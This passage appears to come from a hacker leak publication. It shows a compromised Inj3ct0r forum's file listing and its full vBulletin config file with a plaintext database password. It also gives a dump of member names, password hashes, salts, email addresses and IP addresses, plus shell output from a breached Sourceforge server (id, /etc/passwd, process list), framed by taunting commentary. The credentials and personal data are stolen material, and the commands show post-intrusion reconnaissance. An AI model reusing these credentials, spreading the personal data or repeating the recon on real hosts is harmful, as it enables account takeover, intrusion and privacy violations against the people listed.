  1844. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10850 Jun 29 15:30 groupsubscription.php
  1845. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9375 Jun 29 15:30 image.php
  1846. dr-xr-xr-x  5 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 27 19:42 images
  1847. dr-xr-xr-x  6 n3tw0rkTeRr0r15M inj3ct0r  12288 Jun  6 14:01 includes
  1848. -rwxrwxrwx  1 n3tw0rkTeRr0r15M inj3ct0r  19444 Sep 26 12:27 index.php
  1849. dr-xr-xr-x  6 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 16:28 infernoshout
  1850. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  11103 Jun 29 15:30 infernoshout.php
  1851. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  44256 Jun 29 15:30 infraction.php
  1852. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php
  1853. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10670 Jun 29 15:31 joinrequests.php
  1854. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  11052 Jun 29 15:31 login.php
  1855. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17392 Jun 29 15:31 member.php
  1856. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  16259 Jun 29 15:31 member_inlinemod.php
  1857. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  36229 Jun 29 15:31 memberlist.php
  1858. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  24194 Jun 29 15:31 misc.php
  1859. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 modcp
  1860. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  63652 Jun 29 15:32 moderation.php
  1861. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   7084 Jun 29 15:32 moderator.php
  1862. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   1889 Jun 29 15:32 myip.php
  1863. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  18804 Jun 29 15:32 newattachment.php
  1864. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  37429 Jun 29 15:33 newreply.php
  1865. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19239 Jun 29 15:33 newthread.php
  1866. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19932 Jun 29 15:33 online.php
  1867. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   8024 Jun 29 15:33 payment_gateway.php
  1868. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12238 Jun 29 15:33 payments.php
  1869. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   8217 Jun 29 15:34 picture.php
  1870. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  22368 Jun 29 15:33 picture_inlinemod.php
  1871. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  25635 Jun 29 15:34 picturecomment.php
  1872. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  27740 Jun 29 15:34 poll.php
  1873. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9840 Jun 29 15:34 posthistory.php
  1874. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  74696 Jun 29 15:34 postings.php
  1875. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   6921 Jun 29 15:34 printthread.php
  1876. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  71068 Jun 29 15:34 private.php
  1877. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php
  1878. dr-xr-xr-x  3 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 22:02 r00tpan3l123lol
  1879. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  40079 Jun 29 15:35 register.php
  1880. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   6015 Jun 29 15:35 report.php
  1881. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  14047 Jun 29 15:35 reputation.php
  1882. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php
  1883. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  21274 Jun 29 15:35 sendmessage.php
  1884. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10337 Jun 29 15:36 showgroups.php
  1885. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12716 Jun 29 15:36 showpost.php
  1886. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  73853 Jun 29 15:36 showthread.php
  1887. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 signaturepics
  1888. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 22 15:42 smilies
  1889. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17014 Jun 29 15:36 spy.php
  1890. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  33204 Jun 29 15:36 subscription.php
  1891. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  13693 Jun 29 15:36 tags.php
  1892. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 22 12:03 tech_blue
  1893. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 19 22:04 tech_dark
  1894. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jul 19 22:04 tech_white
  1895. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   9020 Jun 29 15:36 threadrate.php
  1896. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  12743 Jun 29 15:36 threadtag.php
  1897. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  34836 Jun 29 15:37 usercp.php
  1898. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  19423 Jun 29 15:37 usernote.php
  1899. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  29903 Jun 29 15:37 validator.php
  1900. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  27705 Jun 29 15:37 visitormessage.php
  1901.  
  1902. $ cat includes/config.php
  1903. <?php
  1904. /*======================================================================*\
  1905. || #################################################################### ||
  1906. || # vBulletin 3.8.5
  1907. || # ---------------------------------------------------------------- # ||
  1908. || # All PHP code in this file is ©2000-2010 Jelsoft Enterprises Ltd. # ||
  1909. || # This file may not be redistributed in whole or significant part. # ||
  1910. || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
  1911. || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
  1912. || #################################################################### ||
  1913. \*======================================================================*/
  1914.  
  1915. /*-------------------------------------------------------*\
  1916. | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
  1917. +---------------------------------------------------------+
  1918. | If you get any errors while attempting to connect to    |
  1919. | MySQL, you will need to email your webhost because we   |
  1920. | cannot tell you the correct values for the variables    |
  1921. | in this file.                                           |
  1922. \*-------------------------------------------------------*/
  1923.  
  1924.    //   ****** DATABASE TYPE ******
  1925.    //   This is the type of the database server on which your vBulletin database will be located.
  1926.    //   Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
  1927.    // for slave options just append _slave to your preferred database type.
  1928. config['Database']['dbtype'] = 'mysql';
  1929.  
  1930.    //   ****** DATABASE NAME ******
  1931.    //   This is the name of the database where your vBulletin will be located.
  1932.    //   This must be created by your webhost.
  1933. config['Database']['dbname'] = 'n3tw0rkTeRr0r15M';
  1934.  
  1935.    //   ****** TABLE PREFIX ******
  1936.    //   Prefix that your vBulletin tables have in the database.
  1937. config['Database']['tableprefix'] = '';
  1938.  
  1939.    //   ****** TECHNICAL EMAIL ADDRESS ******
  1940.    //   If any database errors occur, they will be emailed to the address specified here.
  1941.    //   Leave this blank to not send any emails when there is a database error.
  1942. config['Database']['technicalemail'] = 'dbmaster@example.com';
  1943.  
  1944.    //   ****** FORCE EMPTY SQL MODE ******
  1945.    // New versions of MySQL (4.1+) have introduced some behaviors that are
  1946.    // incompatible with vBulletin. Setting this value to "true" disables those
  1947.    // behaviors. You only need to modify this value if vBulletin recommends it.
  1948. config['Database']['force_sql_mode'] = false;
  1949.  
  1950.  
  1951.  
  1952.    //   ****** MASTER DATABASE SERVER NAME AND PORT ******
  1953.    //   This is the hostname or IP address and port of the database server.
  1954.    //   If you are unsure of what to put here, leave the default values.
  1955. config['MasterServer']['servername'] = 'localhost';
  1956. config['MasterServer']['port'] = 3306;
  1957.  
  1958.    //   ****** MASTER DATABASE USERNAME & PASSWORD ******
  1959.    //   This is the username and password you use to access MySQL.
  1960.    //   These must be obtained through your webhost.
  1961. config['MasterServer']['username'] = 'n3tw0rkTeRr0r15M';
  1962. config['MasterServer']['password'] = '+)(_3xpl0!t3R_goG)teror15M(_}';
  1963.  
  1964.    //   ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
  1965.    //   This option allows you to turn persistent connections to MySQL on or off.
  1966.    //   The difference in performance is negligible for all but the largest boards.
  1967.    //   If you are unsure what this should be, leave it off. (0 = off; 1 = on)
  1968. config['MasterServer']['usepconnect'] = 0;
  1969.  
  1970.  
  1971.  
  1972.    //   ****** SLAVE DATABASE CONFIGURATION ******
  1973.    //   If you have multiple database backends, this is the information for your slave
  1974.    //   server. If you are not 100% sure you need to fill in this information,
  1975.    //   do not change any of the values here.
  1976. config['SlaveServer']['servername'] = '';
  1977. config['SlaveServer']['port'] = 3306;
  1978. config['SlaveServer']['username'] = '';
  1979. config['SlaveServer']['password'] = '';
  1980. config['SlaveServer']['usepconnect'] = 0;
  1981.  
  1982.  
  1983.  
  1984.    //   ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
  1985.    //   This setting allows you to change the name of the folders that the admin and
  1986.    //   moderator control panels reside in. You may wish to do this for security purposes.
  1987.    //   Please note that if you change the name of the directory here, you will still need
  1988.    //   to manually change the name of the directory on the server.
  1989. config['Misc']['admincpdir'] = 'r00tpan3l123lol';
  1990. config['Misc']['modcpdir'] = 'modcp';
  1991.  
  1992.    //   Prefix that all vBulletin cookies will have
  1993.    //   Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
  1994. config['Misc']['cookieprefix'] = 'bb';
  1995.  
  1996.    //   ******** FULL PATH TO FORUMS DIRECTORY ******
  1997.    //   On a few systems it may be necessary to input the full path to your forums directory
  1998.    //   for vBulletin to function normally. You can ignore this setting unless vBulletin
  1999.    //   tells you to fill this in. Do not include a trailing slash!
  2000.    //   Example Unix:
  2001.    //     config['Misc']['forumpath'] = '/home/users/public_html/forums';
  2002.    //   Example Win32:
  2003.    //     config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
  2004. config['Misc']['forumpath'] = '';
  2005.  
  2006.    //   ****** COOKIE SECURITY HASH ******
  2007.    //   This option allows you to encode cookie.
  2008.    //   You may use any latin and/or any other alphanumeric symbols.
  2009.    //   Leave this blank to use the default value.
  2010.    //   Note: if you change this all users will be logout.
  2011. config['Misc']['cookie_security_hash'] = '';
  2012.  
  2013.  
  2014.  
  2015.    //   ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
  2016.    //   The users specified here will be allowed to view the admin log in the control panel.
  2017.    //   Users must be specified by *ID number* here. To obtain a user's ID number,
  2018.    //   view their profile via the control panel. If this is a new installation, leave
  2019.    //   the first user created will have a user ID of 1. Seperate each userid with a comma.
  2020. config['SpecialUsers']['canviewadminlog'] = '1,237';
  2021.  
  2022.    //   ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
  2023.    //   The users specified here will be allowed to remove ("prune") entries from the admin
  2024.    //   log. See the above entry for more information on the format.
  2025. config['SpecialUsers']['canpruneadminlog'] = '1';
  2026.  
  2027.    //   ****** USERS WITH QUERY RUNNING PERMISSIONS ******
  2028.    //   The users specified here will be allowed to run queries from the control panel.
  2029.    //   See the above entries for more information on the format.
  2030.    //   Please note that the ability to run queries is quite powerful. You may wish
  2031.    //   to remove all user IDs from this list for security reasons.
  2032. config['SpecialUsers']['canrunqueries'] = '';
  2033.  
  2034.    //   ****** UNDELETABLE / UNALTERABLE USERS ******
  2035.    //   The users specified here will not be deletable or alterable from the control panel by any users.
  2036.    //   To specify more than one user, separate userids with commas.
  2037. config['SpecialUsers']['undeletableusers'] = '1';
  2038.  
  2039.    //   ****** SUPER ADMINISTRATORS ******
  2040.    //   The users specified below will have permission to access the administrator permissions
  2041.    //   page, which controls the permissions of other administrators
  2042. config['SpecialUsers']['superadministrators'] = '1';
  2043.  
  2044.    // ****** DATASTORE CACHE CONFIGURATION *****
  2045.    // Here you can configure different methods for caching datastore items.
  2046.    // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
  2047.    // vB_Datastore_APC - to use APC
  2048.    // vB_Datastore_XCache - to use XCache
  2049.    // vB_Datastore_Memcached - to use a Memcache server, more configuration below
  2050. // config['Datastore']['class'] = 'vB_Datastore_Filecache';
  2051.  
  2052.    // ******** DATASTORE PREFIX ******
  2053.    // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
  2054.    // than one set of forums installed on your host, you *may* need to use a prefix
  2055.    // so that they do not try to use the same variable within the cache.
  2056.    // This works in a similar manner to the database table prefix.
  2057. // config['Datastore']['prefix'] = '';
  2058.  
  2059.    // It is also necessary to specify the hostname or IP address and the port the server is listening on
  2060. /*
  2061. config['Datastore']['class'] = 'vB_Datastore_Memcached';
  2062. i = 0;
  2063. // First Server
  2064. i++;
  2065. config['Misc']['memcacheserver'][i]          = '127.0.0.1';
  2066. config['Misc']['memcacheport'][i]            = 11211;
  2067. config['Misc']['memcachepersistent'][i]      = true;
  2068. config['Misc']['memcacheweight'][i]          = 1;
  2069. config['Misc']['memcachetimeout'][i]         = 1;
  2070. config['Misc']['memcacheretry_interval'][i] = 15;
  2071. */
  2072.  
  2073. // ****** The following options are only needed in special cases ******
  2074.  
  2075.    //   ****** MySQLI OPTIONS *****
  2076.    // When using MySQL 4.1+, MySQLi should be used to connect to the database.
  2077.    // If you need to set the default connection charset because your database
  2078.    // is using a charset other than latin1, you can set the charset here.
  2079.    // If you don't set the charset to be the same as your database, you
  2080.    // may receive collation errors.  Ignore this setting unless you
  2081.    // are sure you need to use it.
  2082. // config['Mysqli']['charset'] = 'utf8';
  2083.  
  2084.    //   Optionally, PHP can be instructed to set connection parameters by reading from the
  2085.    //   file named in 'ini_file'. Please use a full path to the file.
  2086.    //   Example:
  2087.    //   config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
  2088. config['Mysqli']['ini_file'] = '';
  2089.  
  2090. // Image Processing Options
  2091.    // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
  2092. config['Misc']['maxwidth'] = 2592;
  2093. config['Misc']['maxheight'] = 1944;
  2094.  
  2095. /*======================================================================*\
  2096. || ####################################################################
  2097. || # CVS: RCSfile - Revision: 28757
  2098. || ####################################################################
  2099. \*======================================================================*/
  2100.  
  2101.  
  2102.                                        /;    ;\                        
  2103.                                    __  \\____//                        
  2104.                                   /{_\_/   `'\____                    
  2105.                                   \___   (o)  (o  }   I AM AN INJ3CT0R
  2106.        _____________________________/          :--' /     CHICK, MOO  
  2107.    ,-,'`@@@@@@@@       @@@@@@         \_    `__\                      
  2108.   ;:(  @@@@@@@@@        @@@             \___(o'o)                      
  2109.   :: )  @@@@          @@@@@@        ,'@@(  `===='                      
  2110.   :: : @@@@@:          @@@@         `@@@:                              
  2111.   :: \  @@@@@:       @@@@@@@)    (  '@@@'                              
  2112.   ;; /\      /`,    @@@@@@@@@\   :@@@@@)                              
  2113.   ::/  )    {_----------------:  :~`,~~;                              
  2114.  ;;'`; :   )                  :  / `; ;                                
  2115. ;;;; : :   ;                  :  ;  ; :                                
  2116. `'`' / :  :                   :  :  : :                                
  2117.     )_ \__;      ";"          :_ ;  \_\       `,','                    
  2118.     :__\  \    * `,'*         \  \  :  \   *  8`;'*  *                
  2119.         `^'     \ :/           `^'  `-^-'   \v/ :  \/   BA            
  2120.  
  2121.  
  2122.  
  2123. Sid3^effects:661567a4c0a71a50fdcf4b2c550775d4:}uP>ob0J%H?EB_&*9z(q7:v%w)j,yx:shell_c99@yahoo.com:122.164.235.10:
  2124. L0rd CrusAd3r:2685fd80293b5b6cf1a2d2f488b2db72:{pmYzcy%QfgFy0ftJ?_>"F|L42vtcK:lord.v5111@gmail.com:59.92.22.151:
  2125. Inj3ct0r:170aebb9d6ba17f411e90b931421f703:.Q:eI}"c";[e`?'o6N/al|}RE;-mNU:admin@admin.com::
  2126. eidelweiss:cd0c84191f189462696ec6de04a5455b:KNU@c;qRh;j$Qc9Vp+r=:$<Pi/rr]T:g1xsystem@windowslive.com:125.167.199.36:
  2127. Sn!pEr.S!Te:c5e3f6e791415b187d3d4e2b3d925f77:H?OV^L*.MS@Q03f9uQ_g]D|@vTE0_v:sniper-site@hotmail.com:188.52.23.241:1111117
  2128. SONiC:4470e1dc2c49e82f9fca1a3dfc390b1a:4gJ4eT\Rj|L}O/%6(@,&05#:ofzi}#:sonicdefence@gmail.com:115.242.246.84:
  2129. Napst3r:d73666e5df3d0eb8a714d5a82178e5d7:#}bjIPUanj,[v2yiQVg~oZhv&<g;`k:n4pst3rr@ymail.com:94.183.216.10:3124741
  2130. Th3 RDX:b76091a46d7539eacf00cb149f12f963:0;a?QrF0KSHPX"t_q\?.[N&(@mK|K[:th3rdx@gmail.com:78.107.237.16:
  2131. agix:81c472aa99efd24319045f02d5f16be6:e_AcAV4sgTlR6rPEk)-&aexwXLqGpo:flogaultier@hotmail.com:82.228.79.212:laconte
  2132. gunslinger_:1b804cc6bf8cbd19c7276d694cf538a6:N_}fYU<sB676{aGTg([1*`p<$yztnG:yudha.gunslinger@gmail.com:182.0.91.89:
  2133. indoushka:3d277315b290351a56ec18e4aee1a988:VZIKmamSDtKwy&KnJU)uT`viut}c,$:indoushka@hotmail.com:41.107.107.238:123456789
  2134. SeeMe:f3dfe545ae017c7fcb8c7df9884255f1:s~.$o798QL'>}mFtE1ZHRD(LW/Uvhj:jimsalimg@msn.com:41.252.59.225:
  2135. KnocKout:64f26f1e22bba61290603bc8f514a56d:`gXoY<&>G~m02Z)EMJK{*oRa\>8aAr:mmertocan@gmail.com:88.242.249.163:
  2136. anT!-Tr0J4n:b6f1b2d02236cb9bc983482c5789999c:`dFJd>n&KjhTtynf#L05jSQ%h'=jsl:rnoom_h@yahoo.com:41.191.28.15:
  2137.  
  2138. ,_._._._._._._._|____________________________________________________
  2139. |_|_|_|_|_|_|_|_|___________________________________________________/
  2140.    ~ ettercap ~ !                                                    
  2141.                                                                      
  2142. You would think that the authors of Ettercap, one of the most  popular
  2143. whitehat  pentesting  tools,  would  know  the  basics  of   security.
  2144. Apparently they don't, or they just  don't  give  a  shit  about  what
  2145. happens to their users.                                              
  2146.                                                                      
  2147. So, why is their website so  insecure?  Ettercap's  message  board  is
  2148. hosted at Sourceforge, so they share a server with thousands of  other
  2149. customers. Every single customer  is  able  to  execute  commands  and
  2150. access the other project directories. Pretty stupid, eh? You only need
  2151. to find one hole in one hosted site and you can access ALL the project
  2152. databases. Of course  that  isn't  ALoR's  fault,  it's  Sourceforge's
  2153. fault. Regardless, people who care about security and  data  integrity
  2154. wouldn't use such a shitty provider,  would  they?  To  be  fair,  the
  2155. Ettercap project is dead. Most of the admins have been inactive for  a
  2156. few years now, but that  is  no  excuse  for  such  a  security  mess.
  2157. Especially since the server was compromised some five years ago.      
  2158.                                                                      
  2159. Just look at the process list, horrible.  Even  the  worst  perl  bots
  2160. (scax) get access. If such a poorly written  bot  can  own  this  box,
  2161. everyone can.                                                        
  2162.                                                                      
  2163. Some  good  advice  to  all  other  people/projects  who   are   using
  2164. Sourceforge: Move. There are  enough  good  alternatives.  Yes,  I  am
  2165. talking to you Vim, get the fuck out of there.  And  to  all  Ettercap
  2166. users: arp  poisoning  is  *not*  hacking.  If  you  want  to  achieve
  2167. something real, learn the fundamentals and not how to use a GUI. Don't
  2168. sniff the passwords of your friends  and  call  yourself  a  pentester
  2169. (looking at you firesheep).                                          
  2170.                                                                      
  2171.           _   _                                                      
  2172.          | | | |                                                      
  2173.       ___| |_| |_ ___ _ __ ___ _ __  __    _ __                      
  2174.      / _ \ __| __/ _ \ '__/ __| '__|/  \  | '_ \                      
  2175.     |  __/ |_| ||  __/ | | (__| |  / /\ \ | |_) |                    
  2176.      \___|\__|\__\___|_|  \___|_| /_/  \_\| .__/                      
  2177.                                           | |                        
  2178.                                           |_|                        
  2179.                     Baa.                                              
  2180.              I flood SID's                                            
  2181.                I'm a Hacker!!              Baa.                      
  2182.  Baa.           Baa.              I sit at starbucks                  
  2183. I sniff packets         |               I'm a Hacker!!                
  2184. I'm a Hacker!!         |                   Baa.                      
  2185. Baa..                |                   /                            
  2186.  \         __  _    |                  /           YOUR ALL FUCKING  
  2187.   \    .-.'  `; `-._  __  _         __  _               SHEEP.        
  2188.    \  (_,         .-:'  `; `-._.-.:'  `; `-._                        
  2189.     ,'o"(  "HACKE(_,          (_,            )                        
  2190.    (__,-'      ,'o"(  "HACKE,'o"(  "HACKER"   )>   STOP BEING SHEEP!  
  2191.       (       (__,-'       (__,-'             )                      
  2192.        `-'._.--._(             (             )     FUCKING INNOVATE!  
  2193.           |||  |||`-'._.--._.-' `-'._.--._.-'                        
  2194.                      |||  |||      |||  |||                          
  2195.  
  2196. $ uname -a
  2197. Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
  2198.  
  2199. $ id
  2200. uid=48(apache) gid=48(apache) groups=48(apache),302(amqp)
  2201.  
  2202. $ cat /etc/passwd
  2203. root:x:0:0:root:/root:/bin/bash
  2204. bin:x:1:1:bin:/bin:/sbin/nologin
  2205. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2206. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2207. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2208. sync:x:5:0:sync:/sbin:/bin/sync
  2209. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2210. halt:x:7:0:halt:/sbin:/sbin/halt
  2211. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2212. news:x:9:13:news:/etc/news:
  2213. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  2214. operator:x:11:0:operator:/root:/sbin/nologin
  2215. games:x:12:100:games:/usr/games:/sbin/nologin
  2216. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  2217. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2218. nobody:x:99:99:Nobody:/:/sbin/nologin
  2219. dbus:x:81:81:System message bus:/:/sbin/nologin
  2220. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
  2221. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  2222. exim:x:93:93::/var/spool/exim:/sbin/nologin
  2223. rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
  2224. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  2225. nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  2226. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  2227. pcap:x:77:77::/var/arpwatch:/sbin/nologin
  2228. avahi:x:70:70:Avahi daemon:/:/sbin/nologin
  2229. ntp:x:38:38::/etc/ntp:/sbin/nologin
  2230. rpm:x:37:37::/var/lib/rpm:/sbin/nologin
  2231. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  2232. xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
  2233. named:x:25:25:Named:/var/named:/sbin/nologin
  2234. sashroot:x:0:500:sashroot:/sashroot:/bin/bash
  2235. osiris:x:300:300:Osiris Daemon:/var/lib/osiris:/sbin/nologin
  2236. puppet:x:301:301:Puppet:/var/lib/puppet:/sbin/nologin
  2237. apache:x:48:48:Apache:/var/www:/sbin/nologin
  2238. vhost:*:310:310:Vhost User:/home/vhost:/bin/bash
  2239. rtstats:*:442:442:RTstats user:/var/local/stats:/bin/bash
  2240. nginx:x:443:443:Nginx user:/var/lib/nginx:/bin/false
  2241. nrpe:x:444:446:NRPE user for the NRPE service:/:/sbin/nologin
  2242. dummy:*:103:103:projectweb dummy user:/home/dummy:/bin/false
  2243. www:*:448:448:WWW User:/var/www:/bin/bash
  2244. sfeng:*:333:333:SF Engineer:/home/sfeng:/bin/rbash
  2245. sfeng2:*:332:332:SF Engineer 2:/home/sfeng2:/bin/bash
  2246. avahi-autoipd:x:449:449:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
  2247. oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
  2248. munin:x:450:450:Munin user:/var/lib/munin:/sbin/nologin
  2249. rrdcached:x:451:451:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin
  2250.  
  2251. $ ps auxwww
  2252. USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
  2253. root         1  0.0  0.0  10352    80 ?        Ss   Sep28   0:46 init [3]
  2254. root         2  0.0  0.0      0     0 ?        S<   Sep28   1:58 [migration/0]
  2255. root         3  0.0  0.0      0     0 ?        SN   Sep28   0:01 [ksoftirqd/0]
  2256. root         4  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/0]
  2257. root         5  0.0  0.0      0     0 ?        S<   Sep28   0:03 [migration/1]
  2258. root         6  0.0  0.0      0     0 ?        SN   Sep28   0:48 [ksoftirqd/1]
  2259. root         7  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/1]
  2260. root         8  0.0  0.0      0     0 ?        S<   Sep28   0:03 [migration/2]
  2261. root         9  0.0  0.0      0     0 ?        SN   Sep28   0:09 [ksoftirqd/2]
  2262. root        10  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/2]
  2263. root        11  0.0  0.0      0     0 ?        S<   Sep28   0:03 [migration/3]
  2264. root        12  0.0  0.0      0     0 ?        SN   Sep28   1:42 [ksoftirqd/3]
  2265. root        13  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/3]
  2266. root        14  0.0  0.0      0     0 ?        S<   Sep28   0:14 [migration/4]
  2267. root        15  0.0  0.0      0     0 ?        SN   Sep28   0:02 [ksoftirqd/4]
  2268. root        16  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/4]
  2269. root        17  0.0  0.0      0     0 ?        S<   Sep28   0:20 [migration/5]
  2270. root        18  0.0  0.0      0     0 ?        SN   Sep28   0:04 [ksoftirqd/5]
  2271. root        19  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/5]
  2272. root        20  0.0  0.0      0     0 ?        S<   Sep28   0:09 [migration/6]
  2273. root        21  0.0  0.0      0     0 ?        SN   Sep28   0:03 [ksoftirqd/6]
  2274. root        22  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/6]
  2275. root        23  0.0  0.0      0     0 ?        S<   Sep28   0:08 [migration/7]
  2276. root        24  0.0  0.0      0     0 ?        SN   Sep28   0:03 [ksoftirqd/7]
  2277. root        25  0.0  0.0      0     0 ?        S<   Sep28   0:00 [watchdog/7]
  2278. root        26  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/0]
  2279. root        27  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/1]
  2280. root        28  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/2]
  2281. root        29  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/3]
  2282. root        30  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/4]
  2283. root        31  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/5]
  2284. root        32  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/6]
  2285. root        33  0.0  0.0      0     0 ?        S<   Sep28   0:00 [events/7]
  2286. root        34  0.0  0.0      0     0 ?        S<   Sep28   0:00 [khelper]
  2287. root       105  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kthread]
  2288. root       116  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/0]
  2289. root       117  0.0  0.0      0     0 ?        S<   Sep28   0:01 [kblockd/1]
  2290. root       118  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/2]
  2291. root       119  0.0  0.0      0     0 ?        S<   Sep28   0:01 [kblockd/3]
  2292. root       120  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/4]
  2293. root       121  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/5]
  2294. root       122  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kblockd/6]
  2295. root       123  0.0  0.0      0     0 ?        S<   Sep28   0:01 [kblockd/7]
  2296. root       124  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kacpid]
  2297. root       237  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/0]
  2298. root       238  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/1]
